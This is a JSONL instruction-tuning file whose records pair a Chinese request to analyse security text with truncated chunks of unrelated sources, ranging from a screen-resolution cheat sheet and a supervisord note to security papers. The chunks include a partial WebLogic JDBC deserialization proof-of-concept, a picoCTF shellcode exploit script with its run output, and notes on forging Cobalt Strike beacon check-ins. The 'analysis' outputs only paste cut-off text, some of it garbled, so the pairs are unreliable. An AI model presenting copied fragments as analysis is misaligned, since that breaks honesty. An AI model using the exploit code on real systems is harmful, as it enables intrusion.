{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Resolutions date: 2020-12-27 17:21:54 tags: - design - screen - size categories: - Other intro: | This cheat sheet lists screen sizes, viewport size and CSS media queries for popular Phones, Tablets, Laptops and Watches --- Getting Started {.cols-2} --------------- ### Introduction - Resolution is the number of pixels (individual points of color) - Viewport is defined by the size of the rectangle filled by a web page on your screen - Screen resolution refers to the clarity of the text and images displayed on your screen - For design {.marker-round} ### Multi-format of Resolutions - [Markdown Table](https://tableconvert.com/html-to-markdown?data=https://quickref.me/resolutions#TableGenerator) - [Template](https://tableconvert.com/html-to-template?data=https://quickref.me/resolutions#TableGenerator) - [LaTeX Table](https://tableconvert.com/html-to-latex?data=https://quickref.me/resolutions#TableGenerator) - [CSV](https://tableconvert.com/html-to-csv?data=https://quickref.me/resolutions#TableGenerator) - [Excel](https://tableconvert.com/html-to-excel?data=https://quickref.me/resolutions#TableGenerator) - [JSON Array](https://tableconvert.com/html-to-json?data=https://quickref.me/resolutions#TableGenerator) - [HTML Table](https://tableconvert.com/html-to-html?data=https://quickref.me/resolutions#TableGenerator) - [Insert SQL](https://tableconvert.com/html-to-sql?data=https://quickref.me/resolutions#TableGenerator) - [YAML Sequence](https://tableconvert.com/html-to-yaml?data=https://quickref.me/resolutions#TableGenerator) - [XML](https://tableconvert.com/html-to-xml?data=https://quickref.me/resolutions#TableGenerator) - [ASCII](https://tableconvert.com/html-to-ascii?data=https://quickref.me/resolutions#TableGenerator) - [MediaWiki Table](https://tableconvert.com/html-to-mediawiki?data=https://quickref.me/resolutions#TableGenerator) - [AsciiDoc Table](https://tableconvert.com/html-to-asciidoc?data=https://quickref.me/resolutions#TableGenerator) - [Jira Table](h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n信息流上线了一个CS上线器 https://i.hacking8.com/cobaltspam 我是照着 https://github.com/hariomenkel/CobaltSpam 来改的而CobaltSpam是https://github.co m/Sentinel-One/CobaltStrikeParser fork修改的后者是用于解析beacon配置的仓库从中可以学到 一些原理 - = 介绍 CS为了兼容MSF默认配置将stage下载的uri硬编码了 , 所以访问 就能得到beacon从中能够解析到C2的各种配置信息 接着就是定位到数据具体怎么找的可以看 https://blog.xpnsec.com/tailoring-cobalt-strike-on-targe t/ 寻找的代码 URL_PATHS = {'x86':'ab2g', 'x64':'ab2h'} full_url = urljoin(url, URL_PATHS[arch]) 执行完就能得到beacon的配置信息了 上线 参考文章: https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/cs-mu-biao-shang-xia n-guo-cheng CS的上线只需要beacon信息中的公钥(从代码中发现的)以及用户自定义的请求包这些都可以从上 述的beacon解析中获得 cs teamserver会通过rsa解密出上线信息所以我们编写上线函数的时候只需要把上线信息通过rsa加 密公钥是beacon解析出来的 上线信息结构 可以直接看源码 https://github.com/mai1zhi2/CobaltstrikeSource decomplie_src\\cobaltstrike4.1\\common\\BeaconEntry.java 根据源码我整理了一份字段表格 名称 描述 占用字 节 aes key aes key 16 ANSI code page 编码 2 OEM code page 编码 2 bid beacon id这个id用来标记心跳状态用这个id连续发包就可以标 记心跳 4 pid beacon进程的pid 4 var7 这短短2字节可以包含 barchis64isUac 2 ver 两个字节两个字节读取最后形式是 x.x 4 build build信息 2 junk 不知道有什么用的字节CobaltSpam直接随机的 12 intz 内网地址 4 填充到第51位填充的都用\\x00 之后是三个字符串用\\t分割 '\\t'.join([机器名称, 用户名称, 注入到的进程名称]) 这些数据都可以自定义比较关注的几个在CS页面上显示的数据 在CobalSpam中上线信息在 comm.py 文件上 上线结构解析 一般的信息直接按上面的结构填充就行下面是一些额外需要关注的字段 external ip是请求过去的ipcobalspam作者使用tor来伪造各种ip我看源码发现如果配置了 trust_x_forwarded_for选项会使用X-Forwarded-For信息作为ip数据默认是不配置的但这个 功能是有用的有的cs server用nginx反代用cdn等等都需要加这个字段否则就看不到目标 的ip 如果设置uac选项user后面就会自动加上 * 号同时图标也会有一个闪闪发光的东西var7字段 两个字节却能设置三个参数 barchis64isUac2byte = 8bit所以实际可以设置8个布尔选 项(目前只用了三个),相关的代码片段如下 图标是怎么来的cs第一个对应的小框框这个地方我找了好久终于找到对应设置的字段了 先看怎么识别操作系统 self.is64 = True self.barch = \"x32\" self.bypassuac = True if self.is64: self.is64 = 4 else: self.is64 = 0 if self.barch == \"x64\": self.is64 += 2 if self.bypassuac: self.is64 += 8 根据beacon id来的如果id是单数就说明这是一个ssh而 BeaconEntry 类刚好有个判断如 果是ssh的话会用 注入到的进程名称 来代表操作系统 知道了设置的地方但还是不知道设置为何值才会显示图标于是去resources看了下搜了下图 片的文件名 windows7.png ,找到了 在 decomplie_src\\cobaltstrike4.1\\dialog\\DialogUtils.java 的 TargetVisualizationArray ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPUBLIC 3/2/2022 Controlling the Source: Abusing Source Code Management Systems Brett Hawkins Adversary Simulation, IBM X-Force Red X-Force Red | 3/2/2022 2 Document Tracking Data Classification: PUBLIC Version Date Author Notes 1.0 3/2/2022 Brett Hawkins Release X-Force Red | 3/2/2022 3 TABLE OF CONTENTS ABSTRACT............................................................................................................................. 5 BACKGROUND ...................................................................................................................... 6 SOURCE CONTROL VS. VERSION CONTROL ............................................................................... 6 SOURCE CONTROL VS. SOURCE CODE MANAGEMENT ................................................................ 6 SOURCE CODE MANAGEMENT SYSTEMS ........................................................................... 6 POPULAR SCM SYSTEMS ....................................................................................................... 7 SCM SYSTEMS AND THE DEVOPS PIPELINE ............................................................................. 7 SOFTWARE SUPPLY CHAIN ATTACKS ....................................................................................... 8 LATERAL MOVEMENT TO OTHER DEVOPS SYSTEMS ................................................................... 9 GITHUB ENTERPRISE ........................................................................................................20 BACKGROUND ....................................................................................................................20 ATTACK SCENARIOS ............................................................................................................22 GITLAB ENTERPRISE .........................................................................................................49 BACKGROUND ..................................................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWebLogic CVE-2021-2294 JDBC 2021112,V-LabOracleWeblogic Server JDBC,2021421 Oracle 201911Yang ZhangBlackHat,MySQL JDBC https://i. blackhat.com/eu-19/Thursday/eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack.pdf WebLogicJDBC jdbcObjectInputStream.readObjectWebLogic JDKJEP290ObjectInputFilterObjectInputStream.readObject RCEweblogicmysql db weblogicoracle dboracle db oraclejdbccvss6.5 10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0 ojdbc6.jar(,weblogicjar,ojdbc*.jar ),oracle.jdbc.pool.OraclePooledConnection.classreadObject this.oracleDriver.connect -> -> -> -> -> -> -> jdbc POC: POC,wireshark java.util.Properties jup = new java.util.Properties(); jup.setProperty(\"InitialLimit\", \"1\"); jup.setProperty(\"MinLimit\", \"1\"); jup.setProperty(\"MaxLimit\", \"2\"); Class<?> aClass = Class.forName(\"oracle.jdbc.driver.OracleDriverExtension\"); Class<?> aClass1 = Class.forName(\"oracle.jdbc.driver.T4CConnection\"); Constructor<?> declaredConstructor1 = aClass1.getDeclaredConstructor(String.class, Properties.class, aClass); declaredConstructor1.setAccessible(true); //ip String ip = \"127.0.0.1:1111\"; Object o = declaredConstructor1.newInstance(\"jdbc:oracle:thin:@\" + ip + \":src\", jup, null); //password Constructor<OpaqueString> declaredConstructor = OpaqueString.class.getDeclaredConstructor(String.class); declaredConstructor.setAccessible(true); OpaqueString opaqueString = declaredConstructor.newInstance(\"123456\"); Field password = aClass1.getDeclaredField(\"password\"); password.setAccessible(true); password.set(o, opaqueString); //userName Class<?> aClass2 = Class.forName(\"oracle.jdbc.driver.GeneratedPhysicalConnection\"); Field userName = aClass2.getDeclaredField(\"userName\"); userName.setAccessible(true); userName.set(o, \"root\"); OraclePooledConnection oraclePooledConnection = new OraclePooledConnection(); //physicalConn Field physicalConn = oraclePooledConnection.getClass().getDeclaredField(\"physicalConn\"); physicalConn.setAccessible(true); physicalConn.set(oraclePoole", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# handy-shellcode Binary Exploitation, 50 points ## Description: > This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #define BUFSIZE 148 #define FLAGSIZE 128 void vuln(char *buf){ gets(buf); puts(buf); } int main(int argc, char **argv){ setvbuf(stdout, NULL, _IONBF, 0); // Set the gid to the effective gid // this prevents /bin/sh from dropping the privileges gid_t gid = getegid(); setresgid(gid, gid, gid); char buf[BUFSIZE]; puts(\"Enter your shellcode:\"); vuln(buf); puts(\"Thanks! Executing now...\"); ((void (*)())buf)(); puts(\"Finishing Executing Shellcode. Exiting now...\"); return 0; } ``` ## Solution: This challenge is similar to last year's [shellcode](/2018_picoCTF/shellcode.md). We'll use pwntools' \"shellcode\" module to generate a shellcode: ```python # First, generate a pwntools template using: # pwn template --host 2019shell1.picoctf.com --user dvdalt --path /problems/handy-shellcode_3_1a2e95a810eefe4a5994631812c0b8af/vuln #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: i386-32-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX disabled # PIE: No PIE (0x8048000) # RWX: Has RWX segments import os if shell is not None: shell.set_working_directory(os.path.dirname(remote_path)) io = start() shellcode = shellcraft.sh() log.info(\"Shellcode: \\n{}\".format(shellcode)) io.sendlineafter(\"Enter your shellcode:\", asm(shellcode)) io.interactive() ``` Output: ```console root@kali:/media/sf_CTFs/pico/handy-shellcode# python exploit.py [*] '/media/sf_CTFs/pico/handy-shellcode/vuln' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments [+] Connecting to 2019shell1.picoctf.com on port 22: Done [*] dvdalt@2019shell1.picoctf.com: Distro ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n作者白帽汇安全研究院@kejaly 校对白帽汇安全研究院@r4v3zn 前言 在研究高版本 JDK 反序列化漏洞的时候往往会涉及到 JEP 290 规范但是网上公开针对 JEP 290 规范 原理研究的资料并不是很多这就导致在研究高版本 java 反序列化的时候有些无能为力所以最近对 JEP 290 规范好好的研究的一番输出这篇文章希望和大家一起交流学习 简介 官方描述 Filter Incoming Serialization Data 即过滤传入的序列化数据 主要内容有 Provide a flexible mechanism to narrow the classes that can be deserialized from any class available to an application down to a context-appropriate set of classes.提供了一个灵活的 机制将可以反序列化的类从应用程序类缩小到适合上下文的类集也就是说提供一个限制反序列 化的类的机制黑白名单方式 Provide metrics to the filter for graph size and complexity during deserialization to validate normal graph behaviors.限制反序列化深度和复杂度 Provide a mechanism for RMI-exported objects to validate the classes expected in invocations.为 RMI 导出的对象设置了验证机制 比如对于 RegistryImpl , DGCImpl 类内置 了默认的白名单过滤 The filter mechanism must not require subclassing or modification to existing subclasses of ObjectInputStream. Define a global filter that can be configured by properties or a configuration file.提供一个全 局过滤器可以从属性或者配置文件中配置 JEP 290 在 JDK 9 中加入但在 JDK 6,7,8 一些高版本中也添加了 官方文档https://openjdk.java.net/jeps/290 JEP 290 核心类 JEP 290 涉及的核心类有 ObjectInputStream 类 ObjectInputFilter 接口 Config 静态类以 及 Global 静态类其中 Config 类是 ObjectInputFilter 接口的内部类 Global 类又是 Config 类的内部类 ObjectInputStream 类 JEP 290 进行过滤的具体实现方法是在 ObjectInputStream 类中增加了一个 serialFilter 属性和一 个 filterChcek 函数两者搭配来实现过滤的 构造函数 有两个构造函数我们需要关注的是在这两个构造函数中都会赋值 serialFilter 字段为 ObjectInputFilter.Config.getSerialFilter() : ObjectInputFilter.Config.getSerialFilter() 返回 ObjectInputFilter#Config 静态类中的 serialFilter 静态字段 Java SE Development Kit 8, Update 121 (JDK 8u121) Java SE Development Kit 7, Update 131 (JDK 7u131) Java SE Development Kit 6, Update 141 (JDK 6u141) serialFilter 属性 serialFilter 属性是一个 ObjectInputFilter 接口类型这个接口声明了一个 checkInput 方法 关于 ObjectInputFilter 后面会更细致的讲解 filterCheck 函数 filterCheck 函数逻辑可以分三步 第一步先会判断 serialFilter 属性值是否为空只有不为空才会进行后续的过滤操作 第二步将我们需要检查的 class 以及 arryLength 等信息封装成一个 FilterValues 对象 传入到 serialFilter.checkInput 方法中返回值为 ObjectInputFilter.Status 类型 最后一步判断 status 的值如果 sta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH IPTABLES-SAVE 8 \"Jan 04, 2001\" \"\" \"\" .\\\" .\\\" Man page written by Harald Welte <laforge@gnumonks.org> .\\\" It is based on the iptables man page. .\\\" .\\\" This program is free software; you can redistribute it and/or modify .\\\" it under the terms of the GNU General Public License as published by .\\\" the Free Software Foundation; either version 2 of the License, or .\\\" (at your option) any later version. .\\\" .\\\" This program is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public License .\\\" along with this program; if not, write to the Free Software .\\\" Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. .\\\" .\\\" .SH NAME iptables-save \\- 保存 IP Tables .SH \"总览 SYNOPSIS\" .BR \"iptables-save \" \"[-c] [-t table]\" .br .SH \"描述 DESCRIPTION\" .PP .B iptables-save 用来将 IP Table 转储为可以简单解析的格式输出到标准输出 STDOUT 可以使用 shell 的 I/O 重定向功能来写入文件 .TP \\fB\\-c\\fR, \\fB\\-\\-counters\\fR 在输出中包含所有报文和字节计数的当前值 .TP \\fB\\-t\\fR, \\fB\\-\\-table\\fR \\fBtablename\\fR .TP 限制只输出一个表如果不指定会输出所有可能的表 .SH BUGS 无 .SH \"作者 AUTHOR\" Harald Welte <laforge@gnumonks.org> .SH \"参见 SEE ALSO\" .BR iptables-restore \"(8), \" iptables \"(8) \" .PP iptables-HOWTO 记述了 iptables 用法的细节 NAT-HOWTO 记述了 NAT 的细节 netfilter-hacking-HOWTO 记述了内部实现的细节 . .SH \"[中文版维护人]\" .B 杨鹏 NetSnake <email> .br .B Poopy <email> (?) .SH \"[中文版最新更新]\" .B 2002.05.01 .SH \"中国linux论坛man手册翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 开放安全数据集整理 整理汇总网络安全方面的开放数据集在[awesome-ml-for-cybersecurity](https://github.com/jivoi/awesome-ml-for-cybersecurity)和[**wstart**](https://xz.aliyun.com/u/395)师傅的文章[1]基础上进行补充和修改 ## 网络安全相关 - [Samples of Security Related Data](http://www.secrepo.com/) - [DARPA Intrusion Detection Data Sets](https://www.ll.mit.edu/r-d/datasets) [ [1998](https://www.ll.mit.edu/r-d/datasets/1998-darpa-intrusion-detection-evaluation-dataset) / [1999](https://www.ll.mit.edu/r-d/datasets/1999-darpa-intrusion-detection-evaluation-dataset) ] - [Stratosphere IPS Data Sets](https://stratosphereips.org/category/dataset.html) - [Open Data Sets](http://csr.lanl.gov/data/) - [Data Capture from National Security Agency](http://www.westpoint.edu/crc/SitePages/DataSets.aspx) - [The ADFA Intrusion Detection Data Sets](https://www.unsw.adfa.edu.au/australian-centre-for-cyber-security/cybersecurity/ADFA-IDS-Datasets/) - **ADFA IDS Datasets** 是澳大利亚国防大学发布的一套关于HIDS的数据集分为LinuxADFA-LD和WindowsADFA-WD - 内容类型主机行为 - 是否特征化是 - 使用范围入侵检测 - [NSL-KDD Data Sets](https://github.com/defcom17/NSL_KDD) - [Malicious URLs Data Sets](http://sysnet.ucsd.edu/projects/url/) - [Multi-Source Cyber-Security Events](http://csr.lanl.gov/data/cyber1/) - [KDD Cup 1999 Data](http://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html) - KDD竞赛在1999年举行时采用的数据集1998年美国国防部高级规划署DARPA在MIT林肯实验室进行了一项入侵检测评估项目收集而来的数据 - 内容类型网络流量主机行为 - 是否特征化是 - 适用范围主机入侵检测异常流量监控 - [Web Attack Payloads](https://github.com/foospidy/payloads) - [WAF Malicious Queries Data Sets](https://github.com/faizann24/Fwaf-Machine-Learning-driven-Web-Application-Firewall) - [Malware Training Data Sets](https://github.com/marcoramilli/MalwareTrainingSets) - [Aktaion Data Sets](https://github.com/jzadeh/Aktaion/tree/master/data) - [CRIME Database from DeepEnd Research](https://www.dropbox.com/sh/7fo4efxhpenexqp/AADHnRKtL6qdzCdRlPmJpS8Aa/CRIME?dl=0) - [Publicly available PCAP files](http://www.netresec.com/?page=PcapFiles) - [2007 TREC Public Spam Corpus](https://plg.uwaterloo.ca/~gvcormac/tre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA\"Hackers\"Guide\"to\"Risk Bruce\"Potter DefCon gdead@shmoo.com ||\"bpotter@keywcorp.com Dont\"believe\"anything\"I\"Say  Also,\"hold\"those\"around\"you\"accountable Failures\"in\"Understanding\"Risk  Fukushima  BP\"Oil\"Spill The\"other\"side\"of\"the\"coin  Takata airbag\"recall  Airbag\"inflator\"may\"rupture\"shoot\"shrapnel\"onto\" passengers\"during\"deployment  Takata knew\"about\"the\"defects\"in\"2004\"and\" attempted\"to\"test\"bags\"in\"offOhours\"to\"avoid\" disclosure  NHTSA\"has\"been\"criticized\"for\"their\"slow\"roll\"on\" the\"problem  34\"million\"cars\"effected\"in\"North\"America.\"Largest\" single\"recall\"in\"the\"history\"of\"automobiles MATH! The\"Math\"Behind\"the\"Takata Recall  Number\"of\"cars\"on\"the\"roads\"per\"year\"in\"the\"US:\"250,000,000  Number\"of\"accidents\"in\"US\"per\"year:\"5,500,000\"(2009)  Number\"of\"accidents\"involving\"airbag\"deployment:\"Lets\"say\"30%...\" Hard\"to\"find\"but\"70%\"of\"reported\"crashes\"are\"property\"damage\" only)\"  (lets\"assume\"100%\"of\"these\"involve\"a\"Takata airbag..\"And\"it\"deploys.\"In\" reality\"94%\"of\"effected\"cars\"have\"1\"Takata airbag\"6%\"have\"2.\"None\" have\"more)  (also\"in\"reality,\"airbags\"only\"deploy\"about\"80%\"of\"the\"time\"in\"serious\" crashes)  So\"the\"number\"of\"Takata airbags\"deployed\"is\"on\"the\"order\"of  (#\"affected[[]]\"cars\"/\"#\"cars\"on\"road)\"*\"#\"of\"airbag\"deployments/year\"=\" 224,400\"crashes\"/\"year\"where\"a\"Takata airbag\"deploys  Airbag\"inflator\"may rupture\"shoot\"shrapnel\"onto\" passengers\"during\"deployment  Ballistic\"testing\"indicates\"failure\"rates\"up\"to\".084%  Some\"samples\"were\"~.04%  Thats\"brings\"us\"to\"~188\"people/year\"potentially\" injured\"by\"Takata airbags  Some\"of\"those\"people\"would\"died\"regardless  My\"assumptions\"to\"this\"point\"have\"been\"worse\"case  Lets\"say\"in\"reality\"were\"talking\"about\"100\"people/year LARGEST\"RECALL\"IN\"US\"AUTOMOTIVE\" HISTORY  Takata O $500\"million  Honda\"O $340\"million  Others\"havent\"reported  Easily\"over\"$1\"billion Is\"preventing\"100\"injuries\"a\"year\" worth\"$1\"billion? Death\"Statistics  ~500\"people/year\"die\"from\"TB  ~500\"people/year\"die\"from\"accidental\"gunshot\" wounds  What\"would\"a\"b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n411: A Framework for Managing Security Alerts Kai Zhong @sixhundredns Ken Lee @kennysan 411: A Framework for Managing Security Alerts Kai Zhong @sixhundredns Ken Lee @kennysan OPEN SOURCE! Who Are We? KZER Kai Zhong Product Security Engineer @ Etsy I wear many hats Twitter: @sixhundredns KLEE Ken Lee Senior Product Security Engineer @ Etsy Spoke at Defcon 21 about Content Security Policy Loves funny cat gifs Twitter: @Kennysan What is Etsy? What Are We Covering? History The Problem(s) Our Solution Alert Management @ Etsy More Examples Demo But First, Some Terminology Logs The ELK Stack Logstash Data processor and log shipper Logstash Data processor and log shipper Allows you to break out your log data into separate fields Logstash Data processor and log shipper Allows you to break out your log data into separate fields We use it to ship logs into Elasticsearch! Elasticsearch Distributed, real-time search engine Elasticsearch Distributed, real-time search engine Allows storing complex, nested documents Elasticsearch Distributed, real-time search engine Allows storing complex, nested documents Allows generating statistics over your data Elasticsearch Distributed, real-time search engine Allows storing complex, nested documents Allows generating statistics over your data We use it for analyzing logs! Kibana Data visualization frontend for Elasticsearch Kibana Data visualization frontend for Elasticsearch Log discovery Kibana Data visualization frontend for Elasticsearch Log discovery Visualizations! History Switching to ELK Work started in mid 2014 Switching to ELK Work started in mid 2014 Finished in mid 2015 Switching to ELK Work started in mid 2014 Finished in mid 2015 We learned a lot from the migration Switching to ELK Work started in mid 2014 Finished in mid 2015 We learned a lot from the migration And got a bunch of great tools out of it It Was A Bumpy Road Hiccups are expected when moving to a new technology It Was A Bumpy Road Hiccups are expected when moving ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsupervisord === 配置后台服务/常驻进程的进程管家工具 ## 安装 ```shell # 安装 supervisord apt-get install supervisor ``` ## 实例 生成配置文件 `/etc/supervisord.conf` ```shell [program:app] command=/usr/bin/gunicorn -w 1 wsgiapp:application directory=/srv/www user=www-data ``` supervisord: 启动 supervisor 服务 ```shell supervisorctl start app supervisorctl stop app supervisorctl reload # 修改/添加配置文件需要执行这个 ``` ## 下载地址 https://pypi.python.org/pypi/meld3 https://pypi.python.org/pypi/supervisor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntranet Invasion Through Anti-DNS Pinning David Byrne, CISSP, MCSE Security Architect EchoStar Satellite L.L.C. / DISH Network DavidRiByrne@yahoo.com Introduction DNS pinning was introduced by web browsers to avoid DNS-spoofing attacks facilitated by client-side code execution. A number of factors including incomplete implementation, browser plug-in vulnerability, plug-in integration and proxy servers have allowed for successful anti-DNS pinning attacks. Using client-side code, such as JavaScript, an internet-based attacker can turn a browser into a proxy server, directing arbitrary attacks at internal servers. DNS Spoofing DNS-spoofing attacks against web browsers are primarily intended to trick a browser into violating the same-origin policy1. Since same-origin applies to hosts, but not IP addresses, an attacker could use a DNS server he controls to erase the distinction between two different servers. This is the basic attack sequence: 1. Get the victim browser to visit a site (probably using XSS), on an attacker- controlled domain. The hostname is typically randomly generated. 2. The victim browser queries the DNS server for the attack domain and receives the attacker-controlled IP address 3. The victim browser requests content from the attack server and becomes infected with the attack code 4. The attack code pauses long enough for the DNS records TTL to expire 5. The attack code initiates a new request to the attack server, and requeries DNS 6. The attack DNS server responds with the IP address of a victim server 7. The attack code connects to the victim server, and does something useful 8. The results are returned to the attacker DNS Pinning To prevent DNS Spoofing attacks, browser makers introduced DNS pinning. This forces the browser into using a single IP address for any given host. Once the DNS response has been received, the browser will pin it in the cache as long as the browser is running. Interestingly, this could be interpreted as a violation of the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Contribution Guidelines Please ensure your pull request adheres to the following guidelines: - Read [the awesome manifesto](https://github.com/sindresorhus/awesome/blob/master/awesome.md) and ensure your list complies. - Search previous suggestions before making a new one, as yours may be a duplicate. - Make sure your list is useful before submitting. That implies it having enough content and every item a good succinct description. - A link back to this list from yours, so users can discover more lists, would be appreciated. - Make an individual pull request for each suggestion. - Titles should be [capitalized](http://grammar.yourdictionary.com/capitalization/rules-for-capitalization-in-titles.html). - Use the following format: `[List Name](link)` - Link additions should be added to the bottom of the relevant category. - New categories or improvements to the existing categorization are welcome. - Check your spelling and grammar. - Make sure your text editor is set to remove trailing whitespace. - The pull request and commit should have a useful title. Thank you for your suggestions!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhaya ATT&CK红队战术漫谈  haya  木星安全实验室  红队负责人  Github: https://github.com/hayasec  Blog: hayasec.me  红蓝对抗与红队武器化 ABOUT ME 今天聊点啥 ATT&CK与红队攻击战术漫谈 ATT&CK矩阵(站在攻击者的视角来描述攻击中各阶段用到的技术的模型) 初 始 访 问 执 行 攻 击 权 限 维 持 权 限 提 升 防 御 绕 过 凭 据 获 取 数 据 披 露 横 向 移 动 目 标 数 据 收 集 内 网 数 据 窃 出 偷渡式攻击 外部程序攻击 硬件植入 USB复制 鱼叉式附件 鱼叉式钓鱼 供应链攻击 可信关系 有效帐户  命令行界面 编译HTML文件 控制面板项 动态数据交换 通过API执行 通过模块加载执行 利用客户端执行 图形用户界面 LSASS驱动 本地作业任务 计划任务 脚本执行 服务执行 签名二进制代理 签名脚本代理执行 文件名后的空格 第三方软件 Trap程序 可信的开发工具 用户执行 WMI Win远程管理 XSL脚本处理  辅助功能 账户操纵 Shimming应用 验证包 BITS任务 浏览器扩展 更改默认文件关联 组件固件 COM劫持 创建账号 DLL顺序劫持 Dylib劫持 外部远程服务 文件系统权限 隐藏文件和目录 挂钩 虚拟机技术 IFEO注入 内核模块和扩展 LSASS驱动 启动Agent 启动守护进程 本地作业调度  访问令牌操作 辅助功能 Bypass UAC DLL搜索劫持 Dylib劫持 漏洞提权 EWM注入 文件系统权限 挂钩 IFEO注入 启动守护进程 新服务 路径拦截 Plist修改 端口监视器 进程注入 SID历史注入 任务计划 服务注册表权限 启动项 Sudo缓存 有效账户 Web Shell  账户操纵 Bash历史 暴力破解 凭证转储 文件凭证 注册表凭证 凭证漏洞利用 强制认证 输入捕获 输入提示 LLMNR投毒 网络嗅探 密码筛选器DLL 私钥 安全内存 双因素拦截  帐户发现 应用窗口发现 浏览器书签发现 文件和目录发现 网络服务扫描 网络共享发现 密码策略发现 外围设备发现 权限组发现 进程发现 查询注册表 远程系统发现 安全软件发现 系统信息发现 网络配置发现 网络连接发现 系统用户发现 系统服务发现 系统时间发现  访问令牌操作 BITS任务 二进制填充 绕过UAC 清除命令历史 代码签名 组件固件 COM劫持 控制面板项 DLL侧载 禁用安全工具 EWM注入 文件删除 文件权限修改 隐藏用户 隐藏窗口 IFEO注入 指标拦截 从主机移除指标 间接命令执行 安装根证书 InstallUtil程序 LC_MAIN劫持  AppleScript消息 应用部署软件 分布式对象模型 远程服务漏洞利用 登陆脚本 PtH PtT 远程桌面协议 远程文件复制 可移动媒体复制 SSH劫持 共享Webroot 污染共享内容 第三方软件 Win管理员共享 Win远程管理 远程服务  音频捕获 自动化收集 剪贴板数据 数据整合 存储库数据 本地系统数据 网络驱动器数据 可移动媒体数据 电子邮件收集 输入捕获 浏览器中间人 截屏 视频捕获  自动化透传 数据压缩 数据加密 数据传输大小限制 透传的备用协议 C2通道进行透传 网络介质透传 物理介质透传 周期传输  常用端口 可移动媒体通信 代理传输 自定义协议 数据编码 数据混淆 域前置 备用信道 多段信道 多层加密  影 响 消 除 账户权限删除 数据销毁 磁盘擦除 终端拒绝服务 固件损坏 拒绝系统恢复 资源劫持 服务停止 数据传输操作  命 令 控 制  红队作战攻击重要步骤  战术中用到的技术点  工具改造与武器化 初始访问@TA0001 初始接入策略代表攻击者用于在网络中取得初始立足点 的(攻击)向量 打点? 初始访问: 打点 薄弱防护系统边缘业务 同C段同ISP 关键集权系统 供应链 ...... 注册表 计划任务 初始访问钓鱼攻击 载荷格式 投递方式 社工话术 利用方式 初始访问: 免杀宏  VelvetSweatshop  诱导  白加黑 执行@TA0002 执行策略表示造成在本地或远程系统上执行由攻击者控 制的代码的技术该策略通常与初始接入一起使用作 为一旦获得访问就执行代码的手段之后进行横向移动 以扩展对网络上远程系统的访问 执行:LOLBINS  https://github.com/LOLBAS-Project/LOLBAS lolbins可以是带有Microsoft签名的二进制文件可以是Microsoft系统目 录中二进制文件 可以是第三方认证签名程序 具有对APT或红队渗透方有用的功能 该程序除过正常的功能外可以做意料", "category": "text_analysis", "source": "security_papers"}
